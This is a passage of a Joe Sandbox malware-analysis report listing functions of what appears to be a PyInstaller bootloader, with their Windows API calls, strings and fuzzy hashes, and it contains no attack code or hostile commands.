Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: fb8dace35f984c3c8d59b22f0dfd890ef8918d876ac5e0f6e5e6b76f1e80faa4
Instruction ID: 75d80522a6082ddee85152527466a2c0804ab19a1ba1ae1b3f634a39a6721c56
Opcode Fuzzy Hash: fb8dace35f984c3c8d59b22f0dfd890ef8918d876ac5e0f6e5e6b76f1e80faa4
Instruction Fuzzy Hash: 64817E71A0C686C5EB60EB24F4416B963B1EF88784F444635EA8DCF785DE3EE5858F40

Function 00007FF666DD1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF666DD17DF
Failed to extract %s: failed to open archive file!, xrefs: 00007FF666DD16A2
fwrite, xrefs: 00007FF666DD17D1
fseek, xrefs: 00007FF666DD16E1
fread, xrefs: 00007FF666DD17E6
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF666DD1742
fopen, xrefs: 00007FF666DD1663
Failed to extract %s: failed to open target file!, xrefs: 00007FF666DD165C
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF666DD16DA
Failed to create symbolic link %s!, xrefs: 00007FF666DD1622
malloc, xrefs: 00007FF666DD1749
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF666DD17CA

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 23ac436432f69dff89e67b7c3031c819f54d06e4f97595c0cc87ed9803ad40dc
Instruction ID: f0a66c82864ea9955d9c760e3f13c5e22b96c9ea85aa851818038cc9fa3f0d8a
Opcode Fuzzy Hash: 23ac436432f69dff89e67b7c3031c819f54d06e4f97595c0cc87ed9803ad40dc
Instruction Fuzzy Hash: 77515A61E08643E2EA10AB61B8015B963B0FF84B98F444731EE4C8F7D6DE3EE5558F40

Function 00007FF666DD8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF666DD3CBB), ref: 00007FF666DD88F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF666DD3CBB), ref: 00007FF666DD88FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF666DD3CBB), ref: 00007FF666DD893C

Part of subcall function 00007FF666DD8A20: GetEnvironmentVariableW.KERNEL32(00007FF666DD388E), ref: 00007FF666DD8A57
Part of subcall function 00007FF666DD8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF666DD8A79

Part of subcall function 00007FF666DE82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE82C1

Part of subcall function 00007FF666DD2810: MessageBoxW.USER32 ref: 00007FF666DD28EA

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF666DD88CC
TMP, xrefs: 00007FF666DD888C, 00007FF666DD8993
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF666DD896E
TMP, xrefs: 00007FF666DD88B2
_MEI%d, xrefs: 00007FF666DD8902

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction ID: b6012a8233333ae018d3dc0b95dad620583a8e185e86d44972e6a385b432643d
Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction Fuzzy Hash: C3418F11A19A82E4FA21BB65B8552B953B0AF89B84F805331ED0DCF7D6DE3EE505DF00

Function 00007FF666DD1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF666DD1249
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF666DD1276
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF666DD12EF
malloc, xrefs: 00007FF666DD12C1, 00007FF666DD12F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF666DD141E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF666DD12BA

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
Instruction ID: 3d923ce01c263ad90db5ffd466f62063d485587fc0f459b5f986fec0d154f023
Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
Instruction Fuzzy Hash: 19519362A08682C5E660AB51B8403BA62A1FF85B98F444335EE4DCF7D5EE3EE545CF40

Function 00007FF666DEED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF666DEF11A,?,?,-00000018,00007FF666DEADC3,?,?,?,00007FF666DEACBA,?,?,?,00007FF666DE5FAE), ref: 00007FF666DEEEFC
GetProcAddress.KERNEL32(?,?,?,00007FF666DEF11A,?,?,-00000018,00007FF666DEADC3,?,?,?,00007FF666DEACBA,?,?,?,00007FF666DE5FAE), ref: 00007FF666DEEF08

Strings

ext-ms-, xrefs: 00007FF666DEEE59
api-ms-, xrefs: 00007FF666DEEE46

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: d56f3f7e57f14dbc6bab5347687ccb668af5421143c13d98ea1407a7806d8c16
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: DA41E361B19A82C1FA15CB16B80457963B5BF89BD0F484639ED1DCF384EE3EE8048B44

Function 00007FF666DD36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF666DD3804), ref: 00007FF666DD36E1
GetLastError.KERNEL32(?,00007FF666DD3804), ref: 00007FF666DD36EB

Part of subcall function 00007FF666DD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF666DD3706,?,00007FF666DD3804), ref: 00007FF666DD2C9E
Part of subcall function 00007FF666DD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF666DD3706,?,00007FF666DD3804), ref: 00007FF666DD2D63
Part of subcall function 00007FF666DD2C50: MessageBoxW.USER32 ref: 00007FF666DD2D99

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF666DD3790
GetModuleFileNameW, xrefs: 00007FF666DD36FA
Failed to obtain executable path., xrefs: 00007FF666DD36F3
Failed to resolve full path to executable %ls., xrefs: 00007FF666DD3739
\\?\, xrefs: 00007FF666DD375A

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 4390b3255deecc02d0a4c1e35758039482345bf33b1e79ded7db5ef6a840c2e3
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: 15216561F1CA82E1FA21A725F8113B62270BF89394F804332E65DCE5D5EE2EE505CF00

Function 00007FF666DEBACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DEBEF9

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
Instruction ID: e3bf5f0cb1d4d6128ab6bd8c83a00ebb07c5624d2685ab2bae8c5fb7da013719
Opcode Fuzzy Hash: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
Instruction Fuzzy Hash: 33C1B422A0CBC6C1E7619B15B5402BDBBB4EB81B80F554231EA4E8F7D1CE7EF8558B10

Function 00007FF666DD8760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF666DD8780
OpenProcessToken.ADVAPI32 ref: 00007FF666DD8793
GetTokenInformation.KERNELBASE ref: 00007FF666DD87B8
GetLastError.KERNEL32 ref: 00007FF666DD87C2
GetTokenInformation.KERNELBASE ref: 00007FF666DD8802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF666DD881E
CloseHandle.KERNEL32 ref: 00007FF666DD8836

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction ID: 7a2f22d23eea1fe5adf71a4fb5cd1628ebd4ab43ed938aafddff6f4fd7099287
Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
Instruction Fuzzy Hash: 2C212121A0CA42D2EB109B55B45463AA7B0FBC5BA0F141335EAAD8FAE4DF7ED4458F40

Function 00007FF666DD90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF666DD8760: GetCurrentProcess.KERNEL32 ref: 00007FF666DD8780
Part of subcall function 00007FF666DD8760: OpenProcessToken.ADVAPI32 ref: 00007FF666DD8793
Part of subcall function 00007FF666DD8760: GetTokenInformation.KERNELBASE ref: 00007FF666DD87B8
Part of subcall function 00007FF666DD8760: GetLastError.KERNEL32 ref: 00007FF666DD87C2
Part of subcall function 00007FF666DD8760: GetTokenInformation.KERNELBASE ref: 00007FF666DD8802
Part of subcall function 00007FF666DD8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF666DD881E
Part of subcall function 00007FF666DD8760: CloseHandle.KERNEL32 ref: 00007FF666DD8836

LocalFree.KERNEL32(?,00007FF666DD3C55), ref: 00007FF666DD916C
LocalFree.KERNEL32(?,00007FF666DD3C55), ref: 00007FF666DD9175

Strings

Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF666DD9183
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF666DD9142
D:(A;;FA;;;%s), xrefs: 00007FF666DD9157
S-1-3-4, xrefs: 00007FF666DD9121

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction ID: 25273913259fff5d96ecad561ca977d3c77457a70775cee1e16f3689c07b208e
Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
Instruction Fuzzy Hash: 9A214B21A08782D1E650AB10F9152EA63B4EF88780F844631EA4D9F786DF3EE8458F80

Function 00007FF666DD7E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00000000,?,00007FF666DD352C,?,00000000,00007FF666DD3F23), ref: 00007FF666DD7F22

Strings

%s%c, xrefs: 00007FF666DD7E94
%.*s, xrefs: 00007FF666DD7EDB
\, xrefs: 00007FF666DD7E87

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 8ca7fb79b4ea6b2c566bb37e9ebd00ba932afb87f6e77ad964f7d4209dd14296
Instruction ID: 96938dedb9dd36aed3322ef5274843387a42352a4be8d72154a39a321e6dbe2a
Opcode Fuzzy Hash: 8ca7fb79b4ea6b2c566bb37e9ebd00ba932afb87f6e77ad964f7d4209dd14296
Instruction Fuzzy Hash: 7231A921719AC195EA21A721F8507EA6378EF84BE4F440331EA5D8F7C9DE3DD6418F00

Function 00007FF666DECFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF666DECFBB), ref: 00007FF666DED0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF666DECFBB), ref: 00007FF666DED177

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 7dec6943a7b24b924e167af1081adb3144db346be1fdd86bb2bca0c91fa0cd9f
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 6C91B672F18691C5F7609F65A4402BDABB0BB95B88F544239DE0E9F685DE3ED482CB00

Function 00007FF666DEF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF666DEFAEC
_get_daylight.LIBCMT ref: 00007FF666DEFAFD
_get_daylight.LIBCMT ref: 00007FF666DEFB0E
_isindst.LIBCMT ref: 00007FF666DEFBD9

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: aa83aded3f43d17765ec42d4e70e1b34931442e7a1d5b3f1b6d09cc5b059b8f4
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 77511872F08655CAFB24CF24B9516BC67B1AB80358F514335EE1DDEAE5DF3AA4028B00

Function 00007FF666DE57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF666DE581F
GetFileInformationByHandle.KERNELBASE ref: 00007FF666DE5881
GetLastError.KERNEL32 ref: 00007FF666DE5912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF666DE5724), ref: 00007FF666DE595E

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
Instruction ID: a6730bcf2dc58bb56bfd2e92f9afbb0240481bfb925374114b5bfc2a9f8b6515
Opcode Fuzzy Hash: 76e5ec389a761054d6dca2d633b3b1debb0125942bc8cb6b4d903665fcb6299d
Instruction Fuzzy Hash: B7516D72E18681CAFB14DF71E8503BD63B1AB48B98F148635DE4D9F689DF3AD4418B10

Function 00007FF666DE5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE56C5
CreateFileW.KERNELBASE ref: 00007FF666DE5704
CloseHandle.KERNEL32 ref: 00007FF666DE5739

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction ID: cddc4e60a14b32d84a2e640ffe163e974fba6a1db3a6380049cfe1b9836ad318
Opcode Fuzzy Hash: 24238bc47b860f74abc13910c6a37bc7991964e3dbe0c30fb6d15975fbdc4001
Instruction Fuzzy Hash: 60418132E187C2C3E7509B20A550369B270FB947A4F109335EA5C4FAD2DF7EA5E08B50

Function 00007FF666DDCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF666DDCE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF666DDCE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF666DDCCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF666DDCD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF666DDCD91

Memory Dump Source

